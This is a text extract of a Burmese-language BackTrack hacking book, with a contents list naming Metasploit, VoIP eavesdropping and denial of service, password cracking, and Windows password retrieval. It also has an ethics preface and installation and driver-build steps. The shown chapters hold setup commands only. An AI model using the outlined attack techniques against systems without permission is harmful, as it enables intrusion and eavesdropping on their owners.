YMA (Penetration Methods of Hackers and Preventing Hacking)
YMA (Penetration Methods of Hackers and Preventing Hacking)
Preface 1
i
Chapter 3 : Information Gathering 49
Introduction 50
Service enumeration 50
Determing the network range 54
Identifying active machines 58
Finding open ports 59
Operating system fingerprinting 62
Service fingerprinting 63
Threat assessment with Maltego 65
Mapping the network 70
ii
Mastering the Metasploit CLI (MSFCLI) 144
Mastering Meterpreter 148
Metasploitable MySQL 151
Metsaploitable PostgreSQL 154
Metasploitable Tomcat 158
Metasploitable PDF 160
Implementing the browser_autopwn module 163
iii
Chapter 8 : Voice over IP (VoIP) 221
Introduction 222
Using Svmap 223
Finding valid extensions 225
Monitoring, capturing and eavesdropping on VoIP traffic 228
Using VoIPong 232
Mastering UCSniff 234
Mastering Xplico 240
Capturing SIP authentication 242
Mastering VoIP Hopper 244
Causing a denial of service 246
Attacking VoIP uisng Metasploit 247
Sniffing DECT phones 249
iv
Chapter 10 : BackTrack Forensics 289
Introduction 290
Intrusion detection and log analysis 290
Recursive directory encryption/decryption 295
Rescanning for signs of rootkits 300
Recovering data from a problematic source 303
Retrieving a Window password 307
Resetting a Windows-password 311
Looking at the Windows registry entries 313
Conclusion 315
v
အၾကံျပဳခ်က္
vi
WPA/WPA2 စသည္တို႕ကို အသံုးျပဳထားေသာ Network မ်ားကိုပါ ထိုးေဖာက္၀င္ေရာက္၍ Key မ်ားကို
Crack ျပဳလုပ္ျခင္းတို႕ကိုပါ ေဖာ္ျပေပးထားပါသည္။ ထို႕ေၾကာင့္ BackTrack သည္ Hacking ကို
ေလ့လာရာတြင္၊ ထိုးေဖာက္ရာတြင္၊ Hacking ျပဳလုပ္ျခင္းမ်ားကို ကာကြယ္ပိတ္ဆို႕ရာတြင္ ၿပိဳင္ဘက္
မရိွေသာ တစ္ခုတည္းေသာ Operating System တစ္ခုလည္းျဖစ္ပါသည္။
သို႕ရာတြင္ ယခုစာအုပ္ကိုဖတ္ရွဳေလ့လာ အသံုးျပဳလိုသူမ်ားကို အႀကံျပဳခ်က္ ႏွစ္ရပ္ျဖင့္ အၾကံျပဳ
ေပးလိုပါသည္။ ပထမတစ္ခ်က္မွာ ေလ့လာသူမ်ားကိုရည္ရြယ္လိုပါသည္။ Hacking နည္းပညာမ်ားကို
ေလ့လာျခင္းသည္ ထင္ထားသကဲ့သို႕ မလြယ္ကူႏိုင္သည္ကို သိရိွၿပီးျဖစ္မည္ဟုထင္ပါသည္။ ယခုစာအုပ္ကို
ဖတ္ရွဳျခင္းျဖင့္ အခက္အခဲေတြ႕ေစႏိုင္မည္႕ အခ်က္တစ္ခုမွာ စိမ္းေနၿပီး အသံုးျပဳသားမက်ျခင္းပင္ ျဖစ္ပါ
လိမ့္မည္။ အသံုးျပဳသူအမ်ားစုသည္ ကြန္ပ်ဴတာကို စတင္အသံုးျပဳကတည္းက Windows Environment
တြင္သာေလ့လာ က်င္လည္ခဲ့ၾကသည္ျဖစ္၍ Linux အႏြယ္၀င္ BackTrack ကိုအသံုးျပဳရာတြင္ အခက္အခဲ
အနည္းႏွင့္အမ်ား ေတြ႕ႀကံဳရမည္ျဖစ္သည္။ ထိ႕ု ေၾကာင့္ ေလ့လာလိုသူမ်ားအေနျဖင့္ BackTrack ကုိေလ့
လာရာတြင္ အခက္အခဲရိွလာခဲ့ပါက Fedora, Suse, Ubuntu စေသာ Linux OS တစ္ခုခုကုိ ဦးစြာေလ့လာ
သင့္ပါသည္။ ထို႕အျပင္ BackTrack တြင္သံုးႏႈန္းေသာ Technical ေ၀ါဟာရအခ်ိဳ႕သည္ အလြန္ထူးျခား
ဆန္းျပားၿပီး အဓိပၸါယ္ဖြင့္ဆိုရခက္ခဲပါသည္။ ထိုအခါ Hacking ကိုယခုမွစတင္ေလ့လာသူ လူသစ္တန္းမ်ား
အတြက္ နားလည္ႏိုင္ေစမည္မဟုတ္ဘဲ hacking ပညာရပ္မ်ားကို ေၾကာက္ရြံ႕သြားမည္ကို စိုးရိမ္မိပါသည္။
ထိုအခါ စိတ္မပ်က္ေစဘဲ ဇြဲရိွရိွျဖင့္ ေက်ာ္ျဖတ္သြားၾကရန္ အေရးႀကီးပါသည္။ လုပ္ေဆာင္ခ်က္မ်ားသည္
ထူးျခားဆန္းျပား၍ ရုတ္တရက္နားမလည္ႏိုင္ေသာ အေၾကာင္းအရာမ်ားကိုလည္း ထပ္တလဲလဲျပန္လည္
ဖတ္ရွဳ၍ စဥ္းစားရန္လုိအပ္ပါသည္။ Hacking ပညာရပ္သည္ Technical ဆန္ဆန္ လုပ္ေဆာင္ခ်က္ကို
အဓိကထားသည္႕ အခ်က္မ်ားပါရိွသကဲ့သို႕ ကဗ်ာဖြဲ႕ဆိုျခင္း၊ သီခ်င္းမ်ားေရးစပ္ျခင္းသကဲ့သို႕ပင္ အႏုပညာ
ျဖင့္နက္နက္နဲနဲ စဥ္းစားရေသာ က႑မ်ားလည္း ပါ၀င္သည္႕အတြက္ အလြယ္တကူ တတ္ေျမာက္ႏိုင္မႈ
မရိွျခင္းကိုစာဖတ္သူမ်ားသေဘာေပါက္ထားရန္လိုအပ္ပါသည္။ ပထမအခက္အခဲကိုေက်ာ္လႊားရန္ အတြက္
အၾကံျပဳလိုသည္မွာ ဤစာအုပ္ကို မည္သို႕မွ နားမလည္ႏိုင္ပါက ပထမထုတ္ေ၀ၿပီးျဖစ္ေသာ “ Hacker
တိ႕ု ၏ထိုးေဖာက္နည္းမ်ားႏွင့္ Hacker အႏၱရာယ္ကာကြယ္နည္းမ်ား” စာအုပ္ကို ဦးစြာဖတ္ရွဳေစလိုပါသည္။
ထိုစာအုပ္သည္ Hacking ပညာရပ္ကို စတင္ဆည္းပူးလိုသူမ်ားအတြက္ ရည္ရြယ္ေရးသားထား
ေသာေၾကာင့္ ထိုစာအုပ္ပါအေၾကာင္းအရာမ်ားကို ေၾကျငက္စြာနားလည္တတ္ေျမာက္ျခင္းသည္ ယခုစာအုပ္
ပါအေၾကာင္းအရာမ်ားကို နားလည္နိုင္ရန္အတြက္ တစ္စိတ္တစ္ေဒသအားျဖင့္ အကူအညီျဖစ္ေစပါလိမ့္
မည္။ ထိ႕ု အျပင္ ဤစာအုပ္ပါအေၾကာင္းအရာမ်ားကို နားလည္ေစရန္ အကူအညီေပးႏိုင္ေသာ ေနာက္
Source တစ္ခုမွာ Internet ပင္ျဖစ္ပါသည္။ ထို႕ေၾကာင့္ သိရိွလိုေသာ အေၾကာင္းအရာမ်ားကို Search
Engine မ်ားျဖစ္ေသာ Google, Yahoo ႏွင့္ Bing တို႕တြင္ရွာေဖြေလ့လာႏိုင္ပါသည္။ ဤစာအုပ္ပါ
အေၾကာင္းအရာမ်ားကို ႏွံ႕စပ္စြာ သိျမင္ျခင္းျဖင့္ Hacking Ability ကုိေနာက္တစ္ဆင့္တိုးျမွင့္ႏိုင္လိမ့္မည္ဟု
ယံုၾကည္ပါသည္။
vii
ဒုတိယအခ်က္အေနျဖင့္ အႀကံျပဳလိုသည္မွာ စမ္းသပ္သူမ်ားႏွင့္ ကၽြမ္းက်င္တတ္ေျမာက္လာသူမ်ား
ကိုရည္ရြယ္ပါသည္။ Hacker တစ္ေယာက္အဖို႕ အဓိကအခ်က္သည္ Hacking ပညာသည္ သူတစ္ပါးကို
ဒုကၡေပးရန္မဟုတ္ ဟူေသာအခ်က္ပင္ျဖစ္ပါသည္။ စမ္းသပ္စရာမ်ားေပါမ်ားလွေသာ Internet တြင္
စမ္းသပ္ရန္အတြက္ အႏူးအညြတ္ေတာင္းပန္အႀကံျပဳလိုသည္မွာ သူတစ္ပါး၏ ခြင့္ျပဳခ်က္မရိွဘဲ ကိုယ္ေရး
ကိုယ္တာအခ်က္အလက္မ်ားကို ရယူရန္ထိုးေဖာက္ျခင္း၊ သူတစ္ပါး၏ Account သို႕မဟုတ္ Website ကို
စီးပြားေရးအရေသာ္လည္းေကာင္း၊ လူမႈေရးအရေသာ္လည္းေကာင္း နစ္နာပ်က္စီးေစရန္ ရည္ရြယ္ခ်က္ျဖင့္
မတိုက္ခိုက္ၾကပါရန္ ေမတၱာရပ္ခံပါသည္။ လက္နက္ဟူသည္ တိုက္ခိုက္ရန္မဟုတ္ဘဲ ကာကြယ္လိုေသာ
ရည္ရြယ္ခ်က္ျဖင့္ အသံုးျပဳသင့္ပါသည္။ ထိ႕ု ေၾကာင့္ စမ္းသပ္မႈမကင္းေသာ Hacker ေလာကတြင္ မျပဳလုပ္
သင့္၊ မျပဳထိုက္ေသာ အျပဳအမူမ်ိဳးကို ေရွာင္ရွားၾကပါရန္ ထပ္ဆင့္တိုက္တြန္းလိုပါသည္။ White Hacker၊
Back Hacker စသည္ျဖင့္ အမည္မတပ္လိုေသာ္လည္း ေကာင္းျမတ္ေသာ အျပဳအမူမ်ားျဖင့္သာ ျမန္မာႏိုင္ငံ
၏ နည္းပညာေလာကကို ျမွင့္တင္ေပးေစလိုပါသည္။
အခ်ဳပ္အားျဖင့္ဆိုရလွ်င္ နည္းပညာအခက္အခဲေၾကာင့္ေသာ္လည္းေကာင္း၊ မသိမနားလည္မႈ
ေၾကာင့္ ေမးျမန္းလိုလွ်င္လည္းေကာင္း [email protected] တြင္ Email ေပးပို႕၍ ေမးျမန္းႏိုင္ပါ
သည္။ ထိ႕ု အျပင္ Facebook စာမ်က္ႏွာျဖစ္ေသာ https://www.facebook.com/telecomtechnical
training တြင္လည္း ေမးျမန္းႏိုင္ပါသည္။ ထို႕အျပင္ ဤစာအုပ္တြင္ အမွားတစ္စံုတစ္ရာကိုေတြ႕ျမင္ျခင္းျဖင့္
အႀကံျပဳေ၀ဖန္ေဆြးေႏြးမႈမ်ားကိုလည္း ႀကိဳဆိုပါသည္။ အကယ္၍ အမွားမ်ားစြာကို ေတြ႕ရပါက စာေရးသူ၏
ပညာရည္မျပည္႕၀မႈေၾကာင့္သာ ျဖစ္ေသာေၾကာင့္ နားလည္သည္းခံခြင့္လႊတ္ေပးၾကပါရန္ အႏူးအညြတ္
ေတာင္းပန္အပ္ပါသည္။ ဤစာအုပ္ပါအေၾကာင္းအရာမ်ားကို BackTrack 5 Cookbook စာအုပ္ကို
ရည္ညႊန္းကိုးကား ေရးသားပါေၾကာင္း ထပ္ေလာင္း၍ ၀န္ခံအပ္ပါသည္။
viii
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Preface
နိဒါန္း
မ်က္ပြင့္စာေပ 1
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Introduction
BackTrack ဆိုသည္မွာ Linux ကိုအေျခခံထားေသာ ထုိးေဖာက္မႈကိုလုပ္ေဆာင္ေစႏိုင္ေသာ လက္နက္
တိုက္တစ္ခုျဖစ္ၿပီး Hacking ျပဳလုပ္ရန္ စစ္မွန္ေသာ Native Environment တြင္ Asssessment မ်ား
ျပဳလုပ္ရန္ႏွင့္ ကြန္ပ်ဴတာ၏လံုၿခံဳေရးကို အသက္ေမြး၀မ္းေက်ာင္းအျဖစ္ အသံုးခ်ႏုိင္ရန္အထိ လုပ္ကိုင္
ႏိုင္ရန္ ကူညီေပးႏိုင္ပါသည္။ BackTrack သည္ digital မႈခင္းေဗဒႏွင့္ ထိုးေဖာက္ေရးစမ္းသပ္မႈမ်ားကို
ျပဳလုပ္ရန္အတြက္ Debian GNU/Linux distribution တြင္ အေျချပဳထားသည္႕ Distribution တစ္ခုလည္း
ျဖစ္သည္။ ၄င္းကိုရွာေဖြေရးနည္းစနစ္တစ္ခုအရ BackTracking ဟူေသာလုပ္ေဆာင္ခ်က္အရ BackTrack
ဟုေခၚတြင္ေစပါသည္။
2 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Chapter 2, Customizing BackTrack တြင္ လူသိမ်ားေသာ Video Card ႏွင့္ Wireless Card အခ်ိဳ႕၏
Driver မ်ားကို Configure ျပဳလုပ္ျခင္းႏွင့္ Install ျပဳလုပ္ျခင္းတို႕ကိုေလ့လာရမည္ျဖစ္သည္။
Chapter 3, Information Gathering တြင္ Malego ႏွင့္ Nmap အပါအ၀င္ Information Gathering
ျပဳလုပ္ေစႏိုင္သည္႕Tool မ်ား၏အသံုးျပဳရပံုမ်ားကို ေလ့လာရပါမည္။
Chapter 4, Vulnerability Identification တြင္ Nessus ႏွင့္ OpenVAS Vulnerability Scanner မ်ားကဲ့
သို႕ေသာ Tool မ်ား၏အသံုးျပဳပံုကိုေဖာ္ျပေပးထားပါသည္။
Chapter 6, Privilege Escalation တြင္ Ettercap, SETႏွင့္ Meterpreter ကဲ့သို႕ေသာ Tool မ်ား အသံုးျပဳပံု
ကိုေလ့လာရပါမည္။
Chapter 7, Wireless Network Analysis တြင္ Wireless Network ကို Exploit ျပဳလုပ္ေစမည္႕ Tool
အမ်ိဳးမ်ိဳး၏အသံုးျပဳပံုကို ေဖာ္ျပသြားမည္ျဖစ္ပါသည္။
Chapter 8, Voice over IP (VoIP) တြင္ Wireless Phone မ်ားႏွင့္ VoIP စနစ္မ်ားကို Attack ျပဳလုပ္ရန္
အသံုးျပဳရသည္႕ Tool အမ်ိဳးမ်ိဳးတို႕၏ အေၾကာင္းကို ရွင္းလင္းစြာေရးသားထားပါသည္။
Chapter 9, Password Cracking တြင္ Password Hash မ်ားႏွင့္ User Account မ်ားကို Crack ျပဳလုပ္ႏိုင္
ရန္အသံုး၀င္သည္႕ Tool မ်ားကို ေဖာ္ထုတ္တင္ျပေပးထားပါသည္။
မ်က္ပြင့္စာေပ 3
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Charpter 10, BackTrack Forensics တြင္ Data ႏွင့္ Encryption ကိုျပန္လည္ ရယူရန္အတြက္ အသံုးျပဳရ
သည္႕ Tool မ်ားကို ေဖာ္ျပထားပါသည္။
4 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Reader feedback
စာဖတ္သူမ်ားမွ အျပန္အလွန္ေဆြးေႏြးျခင္းကို ႀကိဳဆိုပါသည္။ ဤစာအုပ္ပါအေၾကာင္းအရာမ်ားကုိ ထင္ျမင္
သံုးသပ္ခ်က္မ်ား၊ ႀကိဳက္ေသာအခ်က္မ်ား၊ မႀကိဳက္ေသာအခ်က္မ်ားကို သိရိွလိုပါသည္။ စာဖတ္သူ၏
တုံ႕ျပန္သံမ်ားသည္ နည္းပညာပိုင္းဆိုင္ရာတိုးတက္ေစရန္ အေထာက္အကူျဖစ္ေစေသာေၾကာင့္ အေရးႀကီး
ပါသည္။
အကယ္၍ယခုစာအုပ္ပါအေၾကာင္းအရာမ်ားကိုမရွင္းလင္းမႈမ်ား၊ မသဲကြမ
ဲ ႈမ်ားရိွခဲ့ပါကလည္း စာေရးသူ၏
Facebook Account ျဖစ္ေသာ http://www.facebook.com/Telecomtechnicaltraining သို႕စာေရး
သား၍ ရွင္းျပခိုင္းႏိုင္ပါသည္။
Errata
ယခုစာအုပ္ပါ အေၾကာင္းအရာမ်ားကို ေရးသားရာတြင္ အတတ္ႏိုင္ဆံုးအမွားကင္းေစရန္၊ တိက်ေစရန္
ႀကိဳးစားေရးသားခဲ့ေသာ္လည္း အေၾကာင္းတစ္စံုတစ္ရာေၾကာင့္ အမွားမ်ားပါလာႏိုင္ပါသည္။ အကယ္၍
အမွားတစ္စံုတစ္ရာကိုေတြ႕ရိွခဲ့ပါက စာေရးသူ၏ Facebook Account ျဖစ္ေသာ http://www.facebook
.com/telecomtechnicaltraining သို႕အေၾကာင္းၾကားေပးေစလိုပါသည္။ ထိုသို႕အေၾကာင္းၾကားေပးျခင္း
ျဖင့္ ျပန္လည္အမွားျပင္ဆင္ၿပီး ေနာင္ထြက္လာမည္႕ ျပင္ဆင္ျဖည္႕စြက္ခ်က္စာအုပ္မ်ားတြင္ ျပန္လည္
ျပင္ဆင္ေပးႏိုင္မည္ျဖစ္ပါသည္။
မ်က္ပြင့္စာေပ 5
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
6 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Chapter 1
မ်က္ပြင့္စာေပ 7
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Introduction
ယခုအခန္းတြင္ BackTrack OS ကို Install ျပဳလုပ္ျခင္းႏွင့္ Setup ျပဳလုပ္ျခင္းကို အသံုးျပဳႏိုင္ေသာ
နည္းလမ္းအားလံုးျဖင့္ ေလ့လာရပါမည္။ Network တစ္ခုကို Configure ျပဳလုပ္ပံုမ်ားသာမက BackTrack
Linux DVD ကိုအသံုးျပဳျခင္းတို႕ကိုလည္း ေလ့လာႏိုင္မည္ျဖစ္ပါသည္။ ယခုစာအုပ္ပါ အေၾကာင္းအရာမ်ား
ကို BackTrack 5 R3 GNOME 64bit Version ျဖင့္အသံုးျပဳထားၿပီး ၄င္းကို ပူးတြပ
ဲ ါ၀င္ေသာအေခြ
သို႕မဟုတ္ http://www.backtrack-linux.org/downloads မွ Download ျပဳလုပ္ႏိုင္မည္ ျဖစ္ပါသည္။
သို႕ရာတြင္ KDE Version ကိုအသံုးျပဳျခင္းကိုမူ ေဖာ္ျပေပးမည္မဟုတ္ပါ။ သိ႕ု ရာတြင္ GNOME ႏွင့္ KDE
သည္အလြန္တရာကြာျခားျခင္းမရိွသည္႕အတြက္ ေလ့လာရာတြင္အခက္အခဲမရိွဘဲ အသံုးျပဳေစႏိုင္မည္
ျဖစ္ပါသည္။ ယခုအခန္းတြင္ ေအာက္ပါသင္ခန္းစာအစိတ္အပိုင္းမ်ားကို ေလ့လာရေစမည္ျဖစ္ပါသည္။
8 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁။ BackTrack Live DVD ကို DVD Drive ထဲသို႕ထည္႕၍ CD မွစတင္ Boot လုပ္ပါ။ ထိုအခါ CD မွ
အလိုအေလ်ာက္ Boot လုပ္မည္ျဖစ္ၿပီး ေအာက္ေဖာ္ျပပါပံုအတိုင္း BackTrack ၏ Desktop တက္လာ
သည္ကိုေတြ႕ရမည္ျဖစ္ပါသည္။ ပံုတြင္ေတြ႕ရသည္႕ Install BackTrack ကို Double Click ႏိွပ္၍
ေမာင္းႏွင္ေပးရပါမည္။
မ်က္ပြင့္စာေပ 9
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၄။ ႏွစ္သက္ရာ Keyboard Layout ကိုေရြးခ်ယ္ၿပီး ေရွ႕ဆက္ရန္ Forward Button တြင္ Click တစ္ခ်က္
ႏိွပ္ေပးပါ။
မ်က္ပြင့္စာေပ 11
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
12 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
စတင္လုပ္ေဆာင္ရန္အတြက္
၁။ VirtualBox ကိုဖြင့္ပါ။ New တြင္ Click ႏိွပ္ၿပီး Virtual Maching Wizard ကိုစတင္ရပါမည္။
16 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 17
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၆။ Vitual Disk Storage Detail ျဖင့္ Default Option အတိုင္းသာထားကာ ေရွ႕ဆက္ရန္အတြက္ Next
တြင္ Click ႏိွပ္ေပးပါ။
18 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁၁။ VirtualBox Main Window ေပၚတြင္ Backtrack 5 R2 Gnome 64bit ကို Select ျပဳလုပ္ကာ
ေအာက္တြင္ေဖာ္ျပထားေသာပံုအတိုင္း Settings Button တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။
မ်က္ပြင့္စာေပ 19
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁၃။ ထို႕ေနာက္ Storage Tree ေအာက္မွ Empty Disc Icon တြင္ ေရြးခ်ယ္ၿပီး ထိုမွ Attributes တြင္ IDE
Controller ကို ဆက္လက္ေရြးခ်ယ္ေပးပါ။ ယင္းသည္ Virtual အျဖစ္သတ္မွတ္ထားေသာ CD/DVD ROM
Drive လည္းျဖစ္ပါသည္။ လုပ္ေဆာင္ပံုမ်ားကို ေအာက္တြင္ပံုႏွင့္တကြေဖာ္ျပထားပါသည္။ ထို႕ေနာက္ေရြး
ခ်ယ္စရာမ်ားကို ေရြးခ်ယ္ၿပီးစီးပါက OK တြင္ Click ႏိွပ္ေပးပါ။
20 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁၄။ ထို႕ေနာက္ Main Window သို႕ျပန္ေရာက္သြားမည္ျဖစ္ၿပီး Start Button ကို Click ႏိွပ္ေရြးခ်ယ္ေပးရ
ပါမည္။ ထိုအခါ အသစ္ထည္႕သြင္းလိုေသာ OS ကို ထည္႕သြင္းေနသည္ကို ေစာင့္ဆိုင္းေပးရမည္ျဖစ္ပါ
သည္။
မွတ္ရန္။ ။VirtualBox Extension Pack ကုိ Install ျပဳလုပ္ျခင္းသည္ USB 2.0 (EHCI) device
မ်ား၊ Virtual Box RDP ႏွင့္ Intel PXE boot ROM တိ႕ု ကိုထည္႕ျခင္းေပးျခင္းျဖင့္ Virtualization Product
မ်ား၏ လုပ္ေဆာင္ႏိုင္စြမ္းကို တိုးၿမွင့္ေပးေစပါသည္။
prepare-kernel-sources
၂။ Vmware WorkStation ၏ Menu Bar မွ VM တြင္ Click ႏိွပ္၍ ထပ္မံေပၚလာေသာ Menu တြင္ Install
Vmware Tools ကို Click ႏိွပ္ေရြးခ်ယ္ေပးရပါမည္။
မ်က္ပြင့္စာေပ 21
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd vmware-tools-distrib/./vmware-install.pl
22 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
fix-splash
၂။ ထို႕ေနာက္ ေအာက္ပါပံုအတိုင္းေတြ႕ျမင္ရမည္ျဖစ္သည္။
passwd
မ်က္ပြင့္စာေပ 23
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
sshd-generate
24 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၈။ Service တစ္ခုကို Boot Time တြင္ Enable ျပဳလုပ္ႏိုင္ရန္အတြက္ ေအာက္ပါ Command အတိုင္း
အသံုးျပဳႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 25
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
wicd-gtk --no-tray
26 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 27
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
28 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Chapter 2
Customzing BackTrack
BackTrack ကုိေျပာင္းလဲျပင္ဆင္ျခင္း
မ်က္ပြင့္စာေပ 29
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Introduction
ယခုအခန္းတြင္ BackTrack ၏ Customize ျပဳလုပ္ျပင္ဆင္ျခင္းကို ေဖာ္ျပေပးမည္ျဖစ္ၿပီး ထိုသို႕ ျပဳလုပ္
ျခင္းေၾကာင့္ ရရိွလာေစမည္႕ အက်ိဳးေက်းဇူးမ်ားကိုလည္း ရွင္းျပေပးမည္ျဖစ္ပါသည္။ ထို႕အျပင္ ATI ႏွင့္
NVIDIA GPU (Graphic Processing Unit) နည္းပညာမ်ားကိုအသံုးျပဳထားေသာ Graphic Card မ်ား ၏
Driver မ်ားကိုထည္႕သြင္းပံုတို႕ကိုလည္း ရွင္းျပထားပါသည္။ ထို႕အျပင္ ေနာက္ပိုင္းအခန္းမ်ားတြင္ အသံုးျပဳ
ရေသာ အျခားေသာ Tool မ်ားအသံုးျပဳပံုမ်ားကိုလည္း ရွင္းျပထားပါသည္။ ေနာက္ဆံုးအေနျဖင့္ Proxy-
Chains ႏွင့္ Digital အခ်က္အလက္မ်ားကို encrypt ျပဳလုပ္ျခင္းတို႕ကိုလည္း ေလ့လာရမည္ျဖစ္ပါသည္။
အခ်ဳပ္အားျဖင့္ဆိုရလွ်င္ ေအာက္ေဖာ္ျပပါအပိုင္းမ်ားကိုေလ့လာရမည္ျဖစ္ပါသည္။
prepare-kernel-sources
30 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /tmp/
wget http://www.boardcom.com/docs/linux_ata/hybri-portsrc_x86_64-v5_100_82_112.
tar.gz
မ်က္ပြင့္စာေပ 31
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
mkdir boardcom
vim /tmp/broadcom/src/wl/sys/wl_cfg802.11.c
make clean
make
make install
32 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
depmod –a
rmmod <module>b43
<module> ေနရာတြင္ b43 သို႕မဟုတ္ ssb သိ႕ု မဟုတ္ bcma သို႕မဟုတ္ wl ျဖစ္ႏိုင္ပါသည္။
၉။ ေနာက္ဆံုးတြင္ Boot Process ၏ အစိတ္အပိုင္းတြင္ Linux Kenel သိ႕ု ျပဳလုပ္ျခင္းျဖင့္ New Module
ကို ေပါင္းထည္႕ေပးရပါမည္။
modprobe wl
မ်က္ပြင့္စာေပ 33
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ထုိသို႕ျပဳလုပ္ရန္လိုအပ္ခ်က္မ်ားမွာ
cd /tmp/
wget http://www2.ati.com/drivers/linux/amd-driver-installer-12-1-x86.x86_64.run
34 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
sh amd-driver-installer-12-1-x86.x86_64.run
မ်က္ပြင့္စာေပ 35
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.6-lnux64.tgz
mkdir AMD-APP-SDK-v2.6-lnx64
cd AMD-APP-SDK-v2.6 –lnx64
sh Install-AMD-APP.sh
cd /tmp/
cd calpp/trunk
cmake
36 မ်က္ပြင့္စာေပ
